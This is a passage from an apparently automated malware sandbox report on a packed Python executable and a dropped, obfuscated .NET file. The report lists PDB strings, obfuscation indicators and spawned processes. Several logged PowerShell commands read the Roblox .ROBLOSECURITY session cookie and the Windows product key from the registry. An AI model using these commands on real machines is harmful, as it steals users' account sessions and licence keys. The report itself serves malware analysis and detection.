                      Source: sB2ClgrGng.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: sB2ClgrGng.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: sB2ClgrGng.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: sB2ClgrGng.exe, 00000001.00000002.2197225283.00007FFDFB442000.00000040.00000001.01000000.00000004.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: sB2ClgrGng.exe, 00000001.00000002.2194820535.00007FFDF865F000.00000040.00000001.01000000.00000016.sdmp
                      Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: sB2ClgrGng.exe, 00000001.00000002.2195488929.00007FFDFADE1000.00000040.00000001.01000000.0000000F.sdmp
                      Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: sB2ClgrGng.exe, 00000001.00000002.2198558047.00007FFDFF214000.00000040.00000001.01000000.00000010.sdmp
                      Source: Binary string: n.pdb source: powershell.exe, 00000033.00000002.2006716977.000001F23D140000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: sB2ClgrGng.exe, 00000000.00000003.1756191157.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2201961884.00007FFE148D3000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
                      Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: sB2ClgrGng.exe, 00000001.00000002.2195488929.00007FFDFAD49000.00000040.00000001.01000000.0000000F.sdmp
                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: sB2ClgrGng.exe, 00000000.00000003.1756191157.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2201961884.00007FFE148D3000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
                      Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp
                      Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2195488929.00007FFDFADE1000.00000040.00000001.01000000.0000000F.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.pdb source: powershell.exe, 00000033.00000002.1942613111.000001F225215000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000054.00000002.2056884816.00007FF71F100000.00000002.00000001.01000000.00000024.sdmp, rar.exe, 00000054.00000000.2033915659.00007FF71F100000.00000002.00000001.01000000.00000024.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: sB2ClgrGng.exe, 00000001.00000002.2201662595.00007FFE148B1000.00000040.00000001.01000000.0000000D.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.pdbhP source: powershell.exe, 00000033.00000002.1942613111.000001F225215000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: sB2ClgrGng.exe, 00000001.00000002.2200043623.00007FFE11EC1000.00000040.00000001.01000000.00000006.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: sB2ClgrGng.exe, 00000001.00000002.2200583861.00007FFE13201000.00000040.00000001.01000000.00000011.sdmp
                      Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: sB2ClgrGng.exe
                      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: sB2ClgrGng.exe, 00000001.00000002.2199693480.00007FFE0EC5C000.00000040.00000001.01000000.00000008.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: sB2ClgrGng.exe, 00000001.00000002.2200350794.00007FFE130C1000.00000040.00000001.01000000.00000012.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: sB2ClgrGng.exe, 00000001.00000002.2199693480.00007FFE0EC5C000.00000040.00000001.01000000.00000008.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: sB2ClgrGng.exe, 00000001.00000002.2201280162.00007FFE1463E000.00000040.00000001.01000000.00000009.sdmp
                      Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.13 30 Jan 20243.0.13built on: Mon Feb 5 17:39:09 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_
                      Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: sB2ClgrGng.exe, 00000001.00000002.2200882637.00007FFE13381000.00000040.00000001.01000000.0000000C.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: sB2ClgrGng.exe, 00000001.00000002.2199391606.00007FFE0EC11000.00000040.00000001.01000000.0000000A.sdmp
                      Source: Binary string: D:\a\1\b\libssl-3.pdb source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2198558047.00007FFDFF214000.00000040.00000001.01000000.00000010.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2199060511.00007FFE0EBD1000.00000040.00000001.01000000.0000000E.sdmp
                      Source: sB2ClgrGng.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: sB2ClgrGng.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: sB2ClgrGng.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: sB2ClgrGng.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: sB2ClgrGng.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation

                      barindex
                      Source: word.exe.15.dr, 5whPALIRpaC.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{eO6GW79PYldYZmhf60USdfbHoGhiqOgoEJlFPK0g04oze8GBTbSWTryxgq2oxwnScpMQ.hRGt3t2BI5NBE16iVD7xr0HhHEFn3QhLmqZR4Rv3CfDU2gept9oxrZGjpslZB5AWnOLt,eO6GW79PYldYZmhf60USdfbHoGhiqOgoEJlFPK0g04oze8GBTbSWTryxgq2oxwnScpMQ._0dYpdqi5N3KcOOgU48vE2JY8RZtzj4ItqWxDBfyAkmLEw9j0PEimmBzTXFGAtQXJ3DIP,eO6GW79PYldYZmhf60USdfbHoGhiqOgoEJlFPK0g04oze8GBTbSWTryxgq2oxwnScpMQ.D44ELgwAxdB5D1SOR6NZdYKMVQQVbA79aFtCmu4TJOe7j7mQdUyPjeDIyhCP5wL1biXB,eO6GW79PYldYZmhf60USdfbHoGhiqOgoEJlFPK0g04oze8GBTbSWTryxgq2oxwnScpMQ.x60SHmPgLXEYCuJ809IulnRFg8UhYVP5j6KzRmQdd6Tl0rWUX7wwaGYwNohE1CGuI02R,t59oPSjC0CT.kHWaf8XGbIL()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: word.exe.15.dr, 5whPALIRpaC.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{P7kSXxWa2sD[2],t59oPSjC0CT.h3ajPDGSWAH(Convert.FromBase64String(P7kSXxWa2sD[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: word.exe.15.dr, 5whPALIRpaC.cs.Net Code: EVNaqnJWHbq System.AppDomain.Load(byte[])
                      Source: word.exe.15.dr, 5whPALIRpaC.cs.Net Code: vvKZf0kanCj System.AppDomain.Load(byte[])
                      Source: word.exe.15.dr, 5whPALIRpaC.cs.Net Code: vvKZf0kanCj
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline"
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAE9F160 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFDFAE9F160
                      Source: word.exe.15.drStatic PE information: real checksum: 0x0 should be: 0x1ac48
                      Source: tuy1nspn.dll.55.drStatic PE information: real checksum: 0x0 should be: 0xd675
                      Source: _ctypes.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1a726
                      Source: unicodedata.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x57047
                      Source: _bz2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x14723
                      Source: libffi-8.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xa1d1
                      Source: _ssl.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x159c9
                      Source: sqlite3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xa80c8
                      Source: python312.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x1c7d53
                      Source: libcrypto-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x19efbf
                      Source: _queue.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xdab2
                      Source: _socket.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1676e
                      Source: _decimal.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x212a8
                      Source: _hashlib.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x14ecc
                      Source: libssl-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x3a250
                      Source: select.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xfb70
                      Source: _lzma.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x252b5
                      Source: _sqlite3.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x16341
                      Source: sB2ClgrGng.exeStatic PE information: real checksum: 0x79de6b should be: 0x7a2f45
                      Source: libffi-8.dll.0.drStatic PE information: section name: UPX2
                      Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
                      Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF855808B push r12; iretd 1_2_00007FFDF855809F
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF85582D8 push rdi; iretd 1_2_00007FFDF85582DA
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF8559327 push rsp; ret 1_2_00007FFDF8559328
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF8555C31 push r10; ret 1_2_00007FFDF8555C33
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF8558419 push r10; retf 1_2_00007FFDF8558485
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF85594B9 push rsp; retf 1_2_00007FFDF85594BA
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF8555D06 push r12; ret 1_2_00007FFDF8555D08
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF8555CE0 push r10; retf 1_2_00007FFDF8555CE2
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF8555CE5 push r8; ret 1_2_00007FFDF8555CEB
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF8555CED push rdx; ret 1_2_00007FFDF8555CF7
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF8558DBF push rsp; retf 1_2_00007FFDF8558DC0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF855763E push rbp; retf 1_2_00007FFDF8557657
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF8555E18 push rsp; ret 1_2_00007FFDF8555E1C
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF8555DF7 push r10; retf 1_2_00007FFDF8555DFA
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF8555EB4 push rsp; iretd 1_2_00007FFDF8555EB5
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF8557689 push r12; ret 1_2_00007FFDF85576CD
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF8559686 push rdx; ret 1_2_00007FFDF85596DD
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF8555E67 push rdi; iretd 1_2_00007FFDF8555E69
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF8558F42 push rsp; iretq 1_2_00007FFDF8558F43
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF8555F56 push r12; ret 1_2_00007FFDF8555F73
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF8555F01 push r12; ret 1_2_00007FFDF8555F10
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF8555FB9 push r10; ret 1_2_00007FFDF8555FCC
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF8557F67 push rbp; iretq 1_2_00007FFDF8557F68
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF8555F7B push r8; ret 1_2_00007FFDF8555F83
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF8556859 push rsi; ret 1_2_00007FFDF8556890
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF8557FFF push r12; ret 1_2_00007FFDF855804A
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFF1B4021 push rcx; ret 1_2_00007FFDFF1B4022
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9A7AD2A5 pushad ; iretd 13_2_00007FFD9A7AD2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9A8C86CB push ebx; ret 13_2_00007FFD9A8C86CA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9A8C0C07 pushad ; retf 13_2_00007FFD9A8C0C6D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9A8C861B push ebx; ret 13_2_00007FFD9A8C862A
                      Source: word.exe.15.dr, eO6GW79PYldYZmhf60USdfbHoGhiqOgoEJlFPK0g04oze8GBTbSWTryxgq2oxwnScpMQ.csHigh entropy of concatenated method names: 'xCExjsciao65c7Za8gwljxn8BEAgwn58sXylMB6POlqBAmogBa00QjIwggjGD', '_0hKl67MaaT6T71IhzPgDdL9kAnTPy2zpzO9xQB3o6fMIL1sAOCIAbJyfZqFN3', 'VGk5rdOcEQm9iY5Cxgdjscs2xZt7Jtyl9u13SCNzzmobgWGxuBcdxlpLREfKs', 'YkUnyrt9P7NbIkw5i7KxrYhdvaEYaGJXZphsd3pMHlOxvas96IYDEJ1Tz3UIn'
                      Source: word.exe.15.dr, wFhkyj2TAZd.csHigh entropy of concatenated method names: 'rVdbOfrygrD', '_375tVKqBCoR', 'gLfq5HYZZRJ', 'IG9VgjbAyGdfyIPek8f5', 'MACGpF6t9KVDWxop0XIE', 'jPD02mdfQmIFNRL7B9CV', 'sXL36GUfa80M8Mts6QOZ', 'Ry6pnWk6f7uHe9JpD9bS', 'aUfxz2spczDe8bQB9sNA', '_5HR4wlPpX0OZ3sU7zDug'
                      Source: word.exe.15.dr, M7L4lQj5iUzZKZ9rVqg2tDuhxNZPUotqCaXin9eK05hI0acUrmPQJuwvd4jwF6C3k5WSSMajVOWugEYX2fb.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'zhmWdIVKL33jLaxc1oSAwganFnUkKoDUb8RwfisY9tUq0jtcF9mQ8SE2V4oNt', 'cS4el7smZ2myIin1UTtElAT4spS8g7xLEpi7J6aCvT5QAPkCumcJ9cuRLZBy9', 'UrPCh1AFTAQtUoxwkxp70DX6B5XoeoYAXEBNiHn3DrerE3rhwvB60NVbI0e08', 'fqOskespC6CyT28tlx63XMyyCFU2ZWkem2n2XsYEQytel7TEr5EK9AK19BhbU'
                      Source: word.exe.15.dr, t59oPSjC0CT.csHigh entropy of concatenated method names: 'pRqyph6aET2', 'TIbIRTq3Pax', '_37C8BeO7upT', '_5OPcrI5rwuD', 'nV6ztBel0qS', 'NC4YpvcMU0W', 'hYAizJmfVjJ', 'emAHpz4bx6N', 'lpjVak4Mk3R', '_9R9LAPNH3Un'
                      Source: word.exe.15.dr, MGdJK5Be6LW.csHigh entropy of concatenated method names: 'hzesppwIN0M', 'nrGWG8AW4Dy', 'VPWdcoN21zd', '_0hpn9j8CdGU', 'AllYxW4JSvw', '_85Z9ieq4k9P', '_0FkK6JX7vr1', 'cbISOi6znf1', '_0ZsXLznIRgY', '_9sDVG5ycbO5'
                      Source: word.exe.15.dr, VpHhD0XCMxd.csHigh entropy of concatenated method names: 'uKy1GgchXFf', 'bgz0ilBnPcGYLEdGQUQ8blP4gwDyjBPwsKInkiaZx2HI7bksWdanCGtMxr4l3rR6LjFHYYAdFqYIbg', 'a9jtjUsxCZ8tpX1aSDJP5p9n5mT7z0Ev2faS3t7qQ1quzd3xhvVWRwoXkfIBLPu9Ade3tCRDzZbNFV', 'fCEUwmORJsxARbO8UgERNPYER9e6WRZxn5P69pQ1OkbmY3CDBUK55GHNNITNTvlky6ey6o94XtLk9V', 'BwRjrNIALj0CPpwcpIyYAuKvu0BQ84714PsIWnxaHcF4yajoCxhYVFFHBsmATFsVrnn7O05Zm7bkqJ'
                      Source: word.exe.15.dr, 560MLqhQiOg.csHigh entropy of concatenated method names: 'eCLOfkprHJ2', 'DBl9KgVqdbcywR6EjJHw7b5E6Ud2TQhFfQa1S4YxARTH1T', 'a51CzIYiXv1ZUFLqVDpAwDTS72LsJyrPYcnCG4QpjgVbzv', 'hhmY8VC7xSUi199nntYHIuJSUpDJiia1JR84rGrxGjrbFU', 'ORF1LxG67aDCJR5aXdvDc2RswUVEUTxzE0VgUu2MVbppKQ'
                      Source: word.exe.15.dr, 5whPALIRpaC.csHigh entropy of concatenated method names: 'XmFnMS8b4MM', 'EVNaqnJWHbq', 'oXjuipvdzV0', 'cbM6xWBpfyX', 'WqTb5sgwqFw', '_37CNih9QYiT', 'FqIOfEQmvFz', '_2DJg3FuHO0N', 'Av708JQHFI1', 'bVbxw85CiBv'
                      Source: word.exe.15.dr, VuKraMEajh6aEtu04ORbQHh9FmG6vfBJcHDgEeIMYzvazjSWI5uTPELxjgIj83WKzfxN.csHigh entropy of concatenated method names: 'NOvy6h6vxanZpAKXw2Wi81PogHqJxuXH7Nvuz3C08uYQjJnqskmTymWGf6TTHpB5EWz3', 'iRivWf9gFggqHKzLu6PQR5DjOp94EnDXpmAxXZxhH4lk7hoejsmCqsUsvPGO1PU0V8TH', 'jtETNZdbDAe0W6qESjcKSyxmR2UJ9JT9dtqMoa4dT6GyGQp4glmNVCoQi03JZXZFp08i', 'aO36gpMmzbbpUSVSngPqy0b7WwoPCk4MPnjoAa309lh7kg3BtC5tIkE3gA3ReKBQuOAz', 'iqWsiCX78qGVlUHvmn7yxfJZnv7dsqYz8meQsrMqLFcSFk8uyUnsQZvXMra55Q5LGnc2', 'eRqtGcPLsVAkZBHVfcDEnw1xJVZybYi1iDPO5mxzFF5VE3X6XN8V77ChYndBj', 'hJS34WIHv8HuumYgfCl3zitzkDOKUuiccZJR7WfrFOu9CIRcQZY7T1k0Egbvn', 'S3dNB6c0t4gdgfQSi4TFI6GKroNb344RAEcPZbsZCgxYNGTf5rPf4PKab40IP', 'jDUBRtQygkAKLNz4luVyxh1L6O5PS7EDqHhKAxUjdU3vynpIrSAg9z2ouXxiC', 'fSy7b686JahAq0UHw1eZvdYoQnMk9tZdTi31xqPcQDiPF4tSRpau9C4Foko6h'
                      Source: word.exe.15.dr, 65Nsn2AHc1YsaIbggxKProUWrDJnjbfWUl5kBscMMxWQZmk826K2xqGihehhODszqdI3.csHigh entropy of concatenated method names: 'NCPZ9YVC1iTLjmZ8mljnqlo3QvGzAVo3WAAAbGBLv41yOUktUTBg9UbPALNX14CZ1exB', 'JXwFg4ttxfGrVrTaRtBCGTbAKuI7T3ty7lX9uFrNFjYugIRvuIef5mgNDrCixcmzSru2', 'EeufEJem8JMivxiBegl0FvvhDX6FwFt78e0R6DicauWsqIyZsgWtmynjDYWcUiioSBt0', 'gmlWI8CmnGqK1zqHhJkTYe9fwJ3B2a8Podxi2Vr9gJoq03n8jnQbZURlnlPs4ZVhxlY8', 'gu0TD7v9liXZpdqt8SXbKWriY0pnVZDUo58yxJBRzSr2zhGYtkzgt4DDYHAFkTMa3wEg', 'kGDFfQnYrwEfxM3uNIKXOqCdv2woVEsLqWQs7UjTQfH9zyyaWV8oe924wtjSvfai8KFV', 'wBlLsd8u5rLO1EpWLvD8zsFOsuanD2SLnHzSb5NEp00ANHTLeU3NIZMr3mDO0K0p5Jw2', '_25FCdmpb0dBUh7RkE2F6dmh911xcBI5GZ6qptqzWy9tTdR0xBU9jiayn0CvnGYWLHTwm', 'ZPTlSMmCWIQ', 'J50USJA7QK3'
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1
                      Source: initial sampleStatic PE information: section name: UPX0
